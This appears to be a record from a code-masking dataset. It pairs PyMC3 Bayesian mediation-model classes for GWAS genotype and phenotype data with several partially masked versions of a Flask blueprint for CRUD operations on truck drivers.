'''
def __init__(self, variational=True, mb=False,
n_chain=50000, n_trace=5000,
logistic=False, steps=None):
"""
Args:
variational (bool, optional): Use Variational Inference
mb (bool, optional): Use minibatches
"""
self.variational = variational
self.cached_model = None
self.mb = mb
self.n_chain = n_chain
self.n_trace = n_trace
self.logistic = logistic
self.steps = steps
def cache_model(self, **inputs):
"""
Create a cached model for the Bayesian model using
shared theano variables for each Bayesian
input parameter.
Args:
**inputs (dict): inputs for Bayesian model
"""
self.shared_vars = self._create_shared_vars(**inputs)
self.cached_model = self.create_model(**self.shared_vars)
def create_model(self, **inputs):
"""
Each instance of this class needs to define
their PYMC3 model in here.
"""
raise NotImplementedError('This method has to be overwritten.')
def _create_shared_vars(self, **inputs):
"""
For each input variable, create theano shared variable
and set their initial values.
Args:
**inputs (dict): inputs for Bayesian model
Returns:
dict: key, value - var_name, theano.shared variable
"""
shared_vars = {}
for name, data in inputs.items():
shared_vars[name] = shared(data, name=name)
return shared_vars
def _clean_inputs(self, inputs):
"""
Clean the inputs, i.e. remove some
genotype columns. Useful for some class of Bayesian models
such as Two-Stage, where first stage involves filtering
on certain SNPs.
Args:
inputs (dict): inputs for Bayesian model
Returns:
dict: cleaned inputs for Bayesian model
"""
return inputs
def run(self, **inputs):
"""
Run cached Bayesian model using the inputs
Args:
**inputs (dict): inputs for Bayesian model
Returns:
trace: Trace of the PyMC3 inference
"""
if self.cached_model is None:
self.cache_model(**inputs)
for name, data in inputs.items():
self.shared_vars[name].set_value(data)
if self.mb and self.variational:
self.minibatches = zip(self._mb_generator(inputs['gwas_gen']),
self._mb_generator(inputs['gwas_phen']))
self.trace = self._inference()
return self.trace
def _inference(self, n_trace=None):
"""
Perform the inference. Uses ADVI if self.variational
is True. Also, uses minibatches is self.mb=True based
on generators defined in self.run.
Otherwise, uses Metropolis.
Args:
n_trace (int, optional): Number of steps used for trace
Returns:
trace: Trace of the PyMC3 inference
"""
if n_trace is None:
n_trace = self.n_trace
with self.cached_model:
if self.variational:
if self.mb:
v_params = pm.variational.advi_minibatch(n=self.n_chain,
minibatch_tensors=self.minibatch_tensors,
minibatch_RVs=self.minibatch_RVs,
minibatches=self.minibatches,)
else:
v_params = pm.variational.advi(n=self.n_chain)
trace = pm.variational.sample_vp(v_params, draws=n_trace)
self.v_params = v_params
else:
if self.steps is None:
self.steps = pm.Metropolis()
start = pm.find_MAP(fmin=optimize.fmin_powell)
trace = pm.sample(self.n_chain,
step=self.steps,
start=start,
progressbar=True,
)
trace = trace[-n_trace:]
self.trace = trace
return trace
def cross_validation(self, k_folds, **inputs):
"""
Run cross-validation on the inputs and calculate
statistics for each fold test set.
Args:
k_folds (sklearn.cross_validation): Folds of test and train
samples
**inputs (dict): inputs for Bayesian model
Returns:
dict: statistics for each fold
"""
self.cv_stats, self.cv_traces = [], []
self.k_folds = k_folds
inputs = self._clean_inputs(inputs)
for i, fold in enumerate(k_folds):
train, test = fold
input_train, input_test = {}, {}
for name, data in inputs.items():
if name in self.cv_vars:
input_train[name] = data[train]
input_test[name] = data[test]
else:
input_train[name] = data
input_test[name] = data
trace = self.run(**input_train)
stats = self.calculate_statistics(trace, **input_test)
self.cv_traces.append(trace)
self.cv_stats.append(stats)
return self.cv_traces, self.cv_stats
def calculate_ppc(self, trace):
"""
Calculate several post-predictive checks
based on the trace.
"""
dic = pm.stats.dic(trace, self.cached_model)
waic, log_py, logp = calculate_waic(trace, self.cached_model)
#loo = calculate_loo(log_py=log_py)
mu, sd, zscore = self._alpha_stats(trace)
return {'dic': dic,
'waic': waic,
'logp': logp,
#'loo': loo,
'mu': mu,
'sd': sd,
'zscore': zscore}
def calculate_statistics(self, trace, **input_test):
"""
Calculate mse and logp statistics on a test set.
Args:
**input_test (dict): test set of inputs
trace (PyMC3.trace): Trace of the inference chain
Returns:
dict: logp and mse
"""
inputs = self._clean_inputs(input_test)
mc_logp = self._logp(trace, **inputs)
mean_mse = self._mse(trace, **inputs)
mse2 = self._mse2(trace, **inputs)
mu, sd, zscore = self._alpha_stats(trace)
return {'logp': mc_logp,
'mse': mean_mse,
'mse2': mse2,
'mu': mu,
'sd': sd,
'zscore': zscore}
def calculate_bf(self, trace, var_name='mediator_model'):
'''
Calculate Bayes Factor using a Bernoulli variable in the
trace.
'''
p_alt = trace[var_name].mean()
bayes_factor = (p_alt/(1-p_alt))
return bayes_factor
def _logp(self, trace, **inputs):
"""
Calculate log likelihood using Monte Carlo integration.
Args:
**inputs (dict): inputs used in likelhood calculation
trace (PyMC3.trace): Trace of the inference chain
Returns:
float: Log likelihood as estimated by Monte Carlo integration
"""
def calc_log(step):
exp_pred = np.dot(inputs['gwas_gen'],
step['beta_med'].T).ravel()
phen_pred = step['alpha'] * exp_pred
phen_prob = norm.logpdf(x=inputs['gwas_phen'],
loc=phen_pred,
scale=step['phenotype_sigma'])
return phen_prob
phen_probs = [calc_log(trace[idx])
for idx in np.random.randint(0, len(self.trace), 500)]
phen_probs = np.asmatrix(phen_probs)
mc_logp = phen_probs.sum(axis=1).mean()
return mc_logp
def _mse(self, trace, **inputs):
"""
Calculate mean squared error of the model fit.
Args:
**inputs (dict): inputs used in likelhood calculation
trace (PyMC3.trace): Trace of the inference chain
Returns:
float: Mean squared error across all samples
"""
phen_mse = []
for idx in np.random.randint(0, len(trace), 500):
step = self.trace[idx]
exp_pred = np.dot(inputs['gwas_gen'],
step['beta_med'].T).ravel()
phen_pred = step['alpha'] * exp_pred
phen_mse = np.mean((inputs['gwas_phen'] - phen_pred) ** 2)
mean_mse = np.mean(phen_mse)
return mean_mse
def _mse2(self, trace, **inputs):
"""
Calculate mean squared error of the model fit
using posterior means of beta_med instead of
sampling from it.
Args:
**inputs (dict): inputs used in likelhood calculation
trace (PyMC3.trace): Trace of the inference chain
Returns:
float: Mean squared error across all samples
"""
exp = np.dot(inputs['gwas_gen'],
trace['beta_med'].mean(axis=0).T)
phen_pred = exp * trace['alpha'].mean()
mse = np.mean((inputs['gwas_phen'] - phen_pred) ** 2)
return mse
def _alpha_stats(self, trace):
"""
Calculate statistics of the alpha value in
the trace.
"""
mean = np.mean(trace['alpha'])
sd = np.std(trace['alpha'], ddof=1)
zscore = mean / sd
return mean, sd, zscore
def _mb_generator(self, data, size=500):
"""
Generator for minibatches
"""
rng = np.random.RandomState(0)
while True:
ixs = rng.randint(len(data), size=size)
yield data[ixs]
class TwoStage(BayesianModel):
"""
Two Stage Inference.
First stage: Bootstrapped ElasticNet
Second stage: Use loci that were learned in the first stage
and their mean and std as priors for a simple
Bayesian Linear Regression
Attributes:
"""
def __init__(self, coef_mean, coef_sd, p_sigma_beta=10,
*args, **kwargs):
"""
Args:
"""
self.name = 'TwoStage'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'coef_mean': coef_mean,
'coef_sd': coef_sd,
'p_sigma_beta': p_sigma_beta}
super(TwoStage, self).__init__(*args, **kwargs)
def create_model(self, gwas_gen, gwas_phen):
"""
Simple Bayesian Linear Regression
Args:
gwas_gen (pandas.DataFrame): GWAS genotypes
gwas_phen (pandas.DataFrame): GWAS phenotypes
Returns:
pymc3.Model(): The Bayesian model
"""
n_ind, n_snps = gwas_gen.eval().shape
with pm.Model() as phenotype_model:
beta_med = pm.Normal('beta_med',
mu=self.vars['coef_mean'],
sd=self.vars['coef_sd'],
shape=(1, n_snps))
phenotype_expression_mu = pm.dot(beta_med, gwas_gen.T)
intercept = pm.Normal('intercept', mu=0, sd=1)
alpha = pm.Normal('alpha', mu=0, sd=1)
phenotype_mu = intercept + alpha * phenotype_expression_mu
if self.logistic:
p = tinvlogit(phenotype_mu)
phen = pm.Bernoulli('phen', p=p, observed=gwas_phen)
else:
phenotype_sigma = pm.HalfCauchy('phenotype_sigma',
beta=self.vars['p_sigma_beta'])
phen = pm.Normal('phen',
mu=phenotype_mu,
sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
class TwoStageBF(BayesianModel):
"""
Two Stage Inference.
First stage: Bootstrapped ElasticNet
Second stage: Use loci that were learned in the first stage
and their mean and std as priors for a simple
Bayesian Linear Regression
Attributes:
"""
def __init__(self, coef_mean, coef_sd, p_sigma_beta=10,
*args, **kwargs):
"""
Args:
"""
self.name = 'TwoStageBF'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'coef_mean': coef_mean,
'coef_sd': coef_sd,
'p_sigma_beta': p_sigma_beta}
super(TwoStageBF, self).__init__(*args, **kwargs)
def create_model(self, gwas_gen, gwas_phen):
"""
Simple Bayesian Linear Regression
Args:
gwas_gen (pandas.DataFrame): GWAS genotypes
gwas_phen (pandas.DataFrame): GWAS phenotypes
Returns:
pymc3.Model(): The Bayesian model
"""
n_ind, n_snps = gwas_gen.eval().shape
with pm.Model() as phenotype_model:
beta_med = pm.Normal('beta_med',
mu=self.vars['coef_mean'],
sd=self.vars['coef_sd'],
shape=(1, n_snps))
mediator = pm.dot(beta_med, gwas_gen.T)
intercept = pm.Normal('intercept', mu=0, sd=1)
alpha = pm.Normal('alpha', mu=0, sd=1)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma',
beta=self.vars['p_sigma_beta'])
# Model Selection
p = np.array([0.5, 0.5])
mediator_model = pm.Bernoulli('mediator_model', p[1])
# Model 1
phenotype_mu_null = intercept
# Model 2
phenotype_mu_mediator = intercept + alpha * mediator
phen = pm.DensityDist('phen',
lambda value: pm.switch(mediator_model,
pm.Normal.dist(mu=phenotype_mu_mediator, sd=phenotype_sigma).logp(value),
pm.Normal.dist(mu=phenotype_mu_null, sd=phenotype_sigma).logp(value)
),
observed=gwas_phen)
self.steps = [pm.BinaryGibbsMetropolis(vars=[mediator_model]),
pm.Metropolis()]
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
class Joint(BayesianModel):
"""
Jointly model the transcriptional regulation and
its effect on the phenotype.
"""
def __init__(self, model_type='laplace', coef_sd=None, coef_mean=None,
tau_beta=1, lambda_beta=1, m_sigma_beta=10,
p_sigma_beta=10, *args, **kwargs):
"""
Expression ~ N(X\beta, \sigma_exp)
P(\beta) ~ Horseshoe (tau_beta, lambda_beta)
P(\sigma_exp) ~ HalfCauchy(m_sigma_beta)
Phenotype ~ N(X\beta\alpha, \sigma_phen)
P(\alpha) ~ Uniform(-10, 10)
P(\sigma_phen) ~ HalfCauchy(p_sigma_beta)
Args:
tau_beta (int): P(\beta) ~ Horseshoe (tau_beta, lambda_beta)
lambda_beta (int): P(\beta) ~ Horseshoe (tau_beta, lambda_beta)
m_sigma_beta (int): P(\sigma_exp) ~ HalfCauchy(m_sigma_beta)
p_sigma_beta (int): P(\sigma_phen) ~ HalfCauchy(p_sigma_beta)
"""
self.name = 'Joint'
self.model_type = model_type
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'coef_mean': coef_mean,
'coef_sd': coef_sd,
'tau_beta': tau_beta,
'lambda_beta': lambda_beta,
'm_sigma_beta': m_sigma_beta,
'p_sigma_beta': p_sigma_beta
}
if model_type == 'laplace':
self.create_model = self._create_model_laplace
elif model_type == 'horseshoe':
self.create_model = self._create_model_horseshoe
elif model_type == 'prior':
# assert((coef_sd is not None) and (coef_mean is not None),
# 'Must provided coef_mean and coef_sd if using prior')
self.create_model = self._create_model_prior
else:
raise NotImplementedError('Unsupported model type')
super(Joint, self).__init__(*args, **kwargs)
def _create_model_prior(self, med_gen, med_phen,
gwas_gen, gwas_phen):
"""
Args:
med_gen (pandas.DataFrame): Mediator genotypes
med_phen (pandas.DataFrame): Mediator phenotypes
gwas_gen (pandas.DataFrame): GWAS genotypes
gwas_phen (pandas.DataFrame): GWAS phenotypes
"""
n_snps = gwas_gen.eval().shape[1]
with pm.Model() as phenotype_model:
# Expression
beta_med = pm.Normal('beta_med',
mu=self.vars['coef_mean'],
sd=self.vars['coef_sd'],
shape=(1, n_snps))
mediator_intercept = pm.Normal('mediator_intercept',
mu=0,
sd=1)
mediator_mu = mediator_intercept + pm.dot(beta_med, med_gen.T)
mediator_sigma = pm.HalfCauchy('mediator_sigma',
beta=self.vars['m_sigma_beta'])
mediator = pm.Normal('mediator',
mu=mediator_mu,
sd=mediator_sigma,
observed=med_phen)
# Phenotype
intercept = pm.Normal('intercept', mu=0, sd=1)
alpha = pm.Normal('alpha', 0, 1)
# alpha = pm.Uniform('alpha', -10, 10)
phenotype_expression_mu = pm.dot(beta_med, gwas_gen.T)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma',
beta=self.vars['p_sigma_beta'])
phenotype_mu = intercept + alpha * phenotype_expression_mu
phen = pm.Normal('phen',
mu=phenotype_mu,
sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
def _create_model_horseshoe(self, med_gen, med_phen,
gwas_gen, gwas_phen):
"""
Args:
med_gen (pandas.DataFrame): Mediator genotypes
med_phen (pandas.DataFrame): Mediator phenotypes
gwas_gen (pandas.DataFrame): GWAS genotypes
gwas_phen (pandas.DataFrame): GWAS phenotypes
"""
n_snps = gwas_gen.eval().shape[1]
with pm.Model() as phenotype_model:
# Expression
tau_beta = pm.HalfCauchy('tau_beta',
beta=self.vars['tau_beta'])
lambda_beta = pm.HalfCauchy('lambda_beta',
beta=self.vars['lambda_beta'],
shape=(1, n_snps))
# lambda_beta = pm.StudentT('lambda_beta', nu=3, mu=0,
# lam=1, shape=(1, n_snps))
total_variance = pm.dot(lambda_beta * lambda_beta,
tau_beta * tau_beta)
beta_med = pm.Normal('beta_med',
mu=0,
tau=1 / total_variance,
shape=(1, n_snps))
mediator_intercept = pm.Normal('mediator_intercept',
mu=0,
sd=1)
mediator_mu = mediator_intercept + pm.dot(beta_med, med_gen.T)
mediator_sigma = pm.HalfCauchy('mediator_sigma',
beta=self.vars['m_sigma_beta'])
mediator = pm.Normal('mediator',
mu=mediator_mu,
sd=mediator_sigma,
observed=med_phen)
# Phenotype
alpha = pm.Normal('alpha', 0, 1)
intercept = pm.Normal('intercept', mu=0, sd=1)
phenotype_expression_mu = pm.dot(beta_med, gwas_gen.T)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma',
beta=self.vars['p_sigma_beta'])
phenotype_mu = intercept + alpha * phenotype_expression_mu
phen = pm.Normal('phen',
mu=phenotype_mu,
sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
def _create_model_laplace(self, med_gen, med_phen,
gwas_gen, gwas_phen):
"""
Args:
med_gen (pandas.DataFrame): Mediator genotypes
med_phen (pandas.DataFrame): Mediator phenotypes
gwas_gen (pandas.DataFrame): GWAS genotypes
gwas_phen (pandas.DataFrame): GWAS phenotypes
"""
n_snps = gwas_gen.eval().shape[1]
with pm.Model() as phenotype_model:
# Expression
beta_med = pm.Laplace('beta_med', mu=0, b=1, shape=(1, n_snps),)
mediator_intercept = pm.Normal('mediator_intercept',
mu=0,
sd=1)
mediator_mu = mediator_intercept + pm.dot(beta_med, med_gen.T)
mediator_sigma = pm.HalfCauchy('mediator_sigma',
beta=self.vars['m_sigma_beta'])
mediator = pm.Normal('mediator',
mu=mediator_mu,
sd=mediator_sigma,
observed=med_phen)
# Phenotype
intercept = pm.Normal('intercept', mu=0, sd=1)
alpha = pm.Normal('alpha', 0, 1)
# alpha = pm.Uniform('alpha', -10, 10)
phenotype_expression_mu = pm.dot(beta_med, gwas_gen.T)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma',
beta=self.vars['p_sigma_beta'])
phenotype_mu = intercept + alpha * phenotype_expression_mu
phen = pm.Normal('phen',
mu=phenotype_mu,
sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
class MultiStudyMultiTissue(BayesianModel):
"""
Jointly model the transcriptional regulation and
its effect on the phenotype in multiple studies
and multiple tissues. Assume that tissues from the same
individual are independent given the genotypes i.e.
P(TisA, TisB | G) = P(TisA | G) P(TisB | G)
"""
def __init__(self,
m_laplace_beta=1,
m_sigma_beta=10,
p_sigma_beta=10, *args, **kwargs):
"""
Expression ~ N(X\beta, \sigma_exp)
P(\beta) ~ Horseshoe (tau_beta, lambda_beta)
P(\sigma_exp) ~ HalfCauchy(m_sigma_beta)
Phenotype ~ N(X\beta\alpha, \sigma_phen)
P(\alpha) ~ Uniform(-10, 10)
P(\sigma_phen) ~ HalfCauchy(p_sigma_beta)
Args:
tau_beta (int): P(\beta) ~ Horseshoe (tau_beta, lambda_beta)
lambda_beta (int): P(\beta) ~ Horseshoe (tau_beta, lambda_beta)
m_sigma_beta (int): P(\sigma_exp) ~ HalfCauchy(m_sigma_beta)
p_sigma_beta (int): P(\sigma_phen) ~ HalfCauchy(p_sigma_beta)
"""
self.name = 'MultiStudyMultiTissue'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'m_laplace_beta': m_laplace_beta,
'm_sigma_beta': m_sigma_beta,
'p_sigma_beta': p_sigma_beta
}
super(MultiStudyMultiTissue, self).__init__(*args, **kwargs)
def set_idx(self, med_idx, gwas_idx):
self.med_idx = med_idx
self.gwas_idx = gwas_idx
return
def create_model(self,
med_gen, med_phen,
gwas_gen, gwas_phen):
n_snps = gwas_gen.eval().shape[1]
n_tissues = len(np.unique(self.med_idx)) #
n_studies = len(np.unique(self.gwas_idx))
with pm.Model() as phenotype_model:
# Expression
beta_med = pm.Laplace('beta_med',
mu=0,
b=self.vars['m_laplace_beta'],
shape=(1, n_snps),)
mediator_intercept = pm.Normal('mediator_intercept',
mu=0,
sd=1,
shape=n_tissues)
mediator_gamma = pm.Uniform('mediator_gamma',
lower=0,
upper=1,
shape=n_tissues)
mediator_mu = mediator_intercept[self.med_idx] + mediator_gamma[self.med_idx] * pm.dot(beta_med, med_gen.T)
mediator_sigma = pm.HalfCauchy('mediator_sigma',
beta=self.vars['m_sigma_beta'],
shape=n_tissues)
mediator = pm.Normal('mediator',
mu=mediator_mu,
sd=mediator_sigma[self.med_idx],
observed=med_phen)
# Phenotype
intercept = pm.Normal('intercept', mu=0, sd=1, shape=n_studies)
alpha_mu = pm.Normal('alpha_mu', mu=0, sd=1)
alpha_sd = pm.HalfCauchy('alpha_sd', beta=1)
alpha = pm.Normal('alpha', mu=alpha_mu, sd=alpha_sd, shape=n_studies)
# alpha = pm.Uniform('alpha', -10, 10)
phenotype_expression_mu = pm.dot(beta_med, gwas_gen.T)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma',
beta=1,
shape=n_studies)
phen_mu = intercept[self.gwas_idx] + alpha[self.gwas_idx] * phenotype_expression_mu
phen_sigma = phenotype_sigma[self.gwas_idx]
phen = pm.Normal('phen',
mu=phen_mu,
sd=phen_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
class NonMediated(BayesianModel):
"""
Model the relationship between the genotype and
phenotype without any added information about the
mediator. Use it as a basis for getting
the null distribution under a mediation analysis.
"""
def __init__(self,
g_laplace_beta=1,
p_sigma_beta=10, *args, **kwargs):
self.name = 'NonMediated'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'g_laplace_beta': g_laplace_beta,
'p_sigma_beta': p_sigma_beta,
}
super(NonMediated, self).__init__(*args, **kwargs)
def create_model(self,
gwas_gen, gwas_phen):
n_snps = gwas_gen.eval().shape[1]
with pm.Model() as phenotype_model:
beta = pm.Laplace('beta',
mu=0,
b=self.vars['g_laplace_beta'],
shape=(1, n_snps),)
# Phenotype
intercept = pm.Normal('intercept', mu=0, sd=1)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma',
beta=self.vars['p_sigma_beta'])
phenotype_mu = intercept + pm.dot(beta, gwas_gen.T)
phen = pm.Normal('phen',
mu=phenotype_mu,
sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
class MeasurementError(BayesianModel):
"""
Use the canonical definition of measurement error as described
in http://andrewgelman.com/2016/09/04/29847/
"""
def __init__(self,
mediator_mu,
mediator_sd,
m_laplace_beta=1,
p_sigma_beta=10, *args, **kwargs):
self.name = 'MeasurementError'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'mediator_mu': mediator_mu,
'mediator_sd': mediator_sd,
'p_sigma_beta': p_sigma_beta,
}
super(MeasurementError, self).__init__(*args, **kwargs)
def create_model(self, gwas_mediator, gwas_phen, gwas_error):
n_samples = gwas_mediator.eval().shape[0]
with pm.Model() as phenotype_model:
# Phenotype
mediator = pm.Normal('mediator',
mu=self.vars['mediator_mu'],
sd=self.vars['mediator_sd'],
shape=n_samples)
mediator_meas = pm.Normal('mediator_meas',
mu=mediator,
sd=gwas_error,
shape=n_samples,
observed=gwas_mediator)
intercept = pm.Normal('intercept', mu=0, sd=1)
alpha = pm.Uniform('alpha', lower=-10, upper=10)
#alpha = pm.Normal('alpha', mu=0, sd=1)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma',
beta=self.vars['p_sigma_beta'])
phenotype_mu = intercept + alpha * mediator
phen = pm.Normal('phen',
mu=phenotype_mu,
sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
class MeasurementErrorBF(BayesianModel):
"""
Use the canonical definition of measurement error as described
in http://andrewgelman.com/2016/09/04/29847/
"""
def __init__(self,
mediator_mu,
mediator_sd,
precomp_med=True,
heritability=0.1,
p_sigma_beta=10, *args, **kwargs):
self.name = 'MeasurementErrorBF'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'mediator_mu': mediator_mu,
'mediator_sd': mediator_sd,
'heritability': heritability,
'p_sigma_beta': p_sigma_beta,
'precomp_med': precomp_med,
}
super(MeasurementErrorBF, self).__init__(*args, **kwargs)
def create_model(self, gwas_mediator, gwas_phen, gwas_error):
n_samples = gwas_mediator.eval().shape[0]
with pm.Model() as phenotype_model:
# Mediator
mediator = pm.Normal('mediator',
mu=self.vars['mediator_mu'],
sd=self.vars['mediator_sd'],
shape=n_samples)
mediator_meas = pm.Normal('mediator_meas',
mu=mediator,
sd=gwas_error,
shape=n_samples,
observed=gwas_mediator)
intercept = pm.Normal('intercept', mu=0, sd=1)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma',
beta=self.vars['p_sigma_beta'])
if self.vars['precomp_med']:
p_var = t.sqr(phenotype_sigma)
h = self.vars['heritability']
var_explained = (p_var*h)/(1-h)
md_var = np.square(np.mean(self.vars['mediator_sd']))
md_mean_sq = np.square(np.mean(self.vars['mediator_mu']))
var_alpha = var_explained/(md_var + md_mean_sq)
alpha = pm.Normal('alpha', mu=0, sd=t.sqrt(var_alpha))
else:
p_var = t.sqr(phenotype_sigma)
h = self.vars['heritability']
var_explained = (p_var*h)/(1-h)
md_var = t.var(mediator)
md_mean_sq = t.sqr(t.mean(mediator))
var_alpha = var_explained/(md_var + md_mean_sq)
alpha = pm.Normal('alpha', mu=0, sd=t.sqrt(var_alpha))
# Model Selection
p = np.array([0.5, 0.5])
mediator_model = pm.Bernoulli('mediator_model', p[1])
# Model 1
phenotype_mu_null = intercept
# Model 2
phenotype_mu_mediator = intercept + alpha * mediator
phen = pm.DensityDist('phen',
lambda value: pm.switch(mediator_model,
pm.Normal.dist(mu=phenotype_mu_mediator, sd=phenotype_sigma).logp(value),
pm.Normal.dist(mu=phenotype_mu_null, sd=phenotype_sigma).logp(value)
),
observed=gwas_phen)
self.steps = [pm.BinaryGibbsMetropolis(vars=[mediator_model]),
pm.Metropolis()]
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model | [
28,
29,
46,
49,
55
] |
1,690 | ee7820d50b5020a787fbaf012480e8c70bc0ee41 | <mask token>
@driver_api.route('/<int:driver_id>', methods=['PUT'])
def update(driver_id):
req_data = request.get_json()
data, error = driver_schema.load(req_data, partial=True)
if error:
return custom_response({'Error': 'Driver not found.'}, 400)
driver = DriverModel.get_one_driver(driver_id)
driver.update(data)
response = driver_schema.dump(driver).data
return custom_response(response, 200)
<mask token>
@driver_api.route('/list_not_loaded', methods=['GET'])
def list_truck_not_loaded():
driver = DriverModel.truck_not_loaded()
response = driver_schema.dump(driver, many=True).data
return custom_response(response, 200)
<mask token>
| <mask token>
@driver_api.route('/', methods=['POST'])
def create():
req_data = request.get_json()
data, error = driver_schema.load(req_data)
if error:
return custom_response(error, 400)
driver_in_db = DriverModel.get_driver_by_name(data.get('name'))
if driver_in_db:
return custom_response({'Error': 'Driver already exist.'}, 400)
driver = DriverModel(data)
driver.save()
response = driver_schema.dump(driver).data
return custom_response(response, 201)
<mask token>
@driver_api.route('/<int:driver_id>', methods=['PUT'])
def update(driver_id):
req_data = request.get_json()
data, error = driver_schema.load(req_data, partial=True)
if error:
return custom_response({'Error': 'Driver not found.'}, 400)
driver = DriverModel.get_one_driver(driver_id)
driver.update(data)
response = driver_schema.dump(driver).data
return custom_response(response, 200)
@driver_api.route('/<int:driver_id>', methods=['DELETE'])
def delete(driver_id):
driver = DriverModel.get_one_driver(driver_id)
if not driver:
return custom_response({'Error': 'Driver not found.'}, 400)
driver.delete()
return custom_response({'Sucess': 'Driver deleted with sucess!'}, 200)
@driver_api.route('/list_not_loaded', methods=['GET'])
def list_truck_not_loaded():
driver = DriverModel.truck_not_loaded()
response = driver_schema.dump(driver, many=True).data
return custom_response(response, 200)
@driver_api.route('/list_trucks_owned', methods=['GET'])
def list_truck_owned():
driver = DriverModel.truck_owned()
response = driver_schema.dump(driver, many=True).data
return custom_response(response, 200)
<mask token>
| <mask token>
@driver_api.route('/', methods=['POST'])
def create():
req_data = request.get_json()
data, error = driver_schema.load(req_data)
if error:
return custom_response(error, 400)
driver_in_db = DriverModel.get_driver_by_name(data.get('name'))
if driver_in_db:
return custom_response({'Error': 'Driver already exist.'}, 400)
driver = DriverModel(data)
driver.save()
response = driver_schema.dump(driver).data
return custom_response(response, 201)
@driver_api.route('/<int:driver_id>', methods=['GET'])
def get(driver_id):
driver = DriverModel.get_one_driver(driver_id)
if not driver:
return custom_response({'Error': 'Driver not found.'}, 404)
response = driver_schema.dump(driver).data
return custom_response(response, 200)
@driver_api.route('/<int:driver_id>', methods=['PUT'])
def update(driver_id):
req_data = request.get_json()
data, error = driver_schema.load(req_data, partial=True)
if error:
return custom_response({'Error': 'Driver not found.'}, 400)
driver = DriverModel.get_one_driver(driver_id)
driver.update(data)
response = driver_schema.dump(driver).data
return custom_response(response, 200)
@driver_api.route('/<int:driver_id>', methods=['DELETE'])
def delete(driver_id):
driver = DriverModel.get_one_driver(driver_id)
if not driver:
return custom_response({'Error': 'Driver not found.'}, 400)
driver.delete()
return custom_response({'Sucess': 'Driver deleted with sucess!'}, 200)
@driver_api.route('/list_not_loaded', methods=['GET'])
def list_truck_not_loaded():
driver = DriverModel.truck_not_loaded()
response = driver_schema.dump(driver, many=True).data
return custom_response(response, 200)
@driver_api.route('/list_trucks_owned', methods=['GET'])
def list_truck_owned():
driver = DriverModel.truck_owned()
response = driver_schema.dump(driver, many=True).data
return custom_response(response, 200)
def custom_response(response, status_code):
return Response(mimetype='application/json', response=json.dumps(
response), status=status_code)
| from flask import request, json, Response, Blueprint
from ..models.DriverModel import DriverModel, DriverSchema
driver_api = Blueprint('drivers', __name__)
driver_schema = DriverSchema()
@driver_api.route('/', methods=['POST'])
def create():
req_data = request.get_json()
data, error = driver_schema.load(req_data)
if error:
return custom_response(error, 400)
driver_in_db = DriverModel.get_driver_by_name(data.get('name'))
if driver_in_db:
return custom_response({'Error': 'Driver already exist.'}, 400)
driver = DriverModel(data)
driver.save()
response = driver_schema.dump(driver).data
return custom_response(response, 201)
@driver_api.route('/<int:driver_id>', methods=['GET'])
def get(driver_id):
driver = DriverModel.get_one_driver(driver_id)
if not driver:
return custom_response({'Error': 'Driver not found.'}, 404)
response = driver_schema.dump(driver).data
return custom_response(response, 200)
@driver_api.route('/<int:driver_id>', methods=['PUT'])
def update(driver_id):
req_data = request.get_json()
data, error = driver_schema.load(req_data, partial=True)
if error:
return custom_response({'Error': 'Driver not found.'}, 400)
driver = DriverModel.get_one_driver(driver_id)
driver.update(data)
response = driver_schema.dump(driver).data
return custom_response(response, 200)
@driver_api.route('/<int:driver_id>', methods=['DELETE'])
def delete(driver_id):
driver = DriverModel.get_one_driver(driver_id)
if not driver:
return custom_response({'Error': 'Driver not found.'}, 400)
driver.delete()
return custom_response({'Sucess': 'Driver deleted with sucess!'}, 200)
@driver_api.route('/list_not_loaded', methods=['GET'])
def list_truck_not_loaded():
driver = DriverModel.truck_not_loaded()
response = driver_schema.dump(driver, many=True).data
return custom_response(response, 200)
@driver_api.route('/list_trucks_owned', methods=['GET'])
def list_truck_owned():
driver = DriverModel.truck_owned()
response = driver_schema.dump(driver, many=True).data
return custom_response(response, 200)
def custom_response(response, status_code):
return Response(mimetype='application/json', response=json.dumps(
response), status=status_code)
| from flask import request, json, Response, Blueprint
from ..models.DriverModel import DriverModel, DriverSchema
driver_api = Blueprint('drivers', __name__)
driver_schema = DriverSchema()
@driver_api.route('/', methods=['POST'])
def create():
req_data = request.get_json()
data, error = driver_schema.load(req_data)
if error:
return custom_response(error, 400)
driver_in_db = DriverModel.get_driver_by_name(data.get('name'))
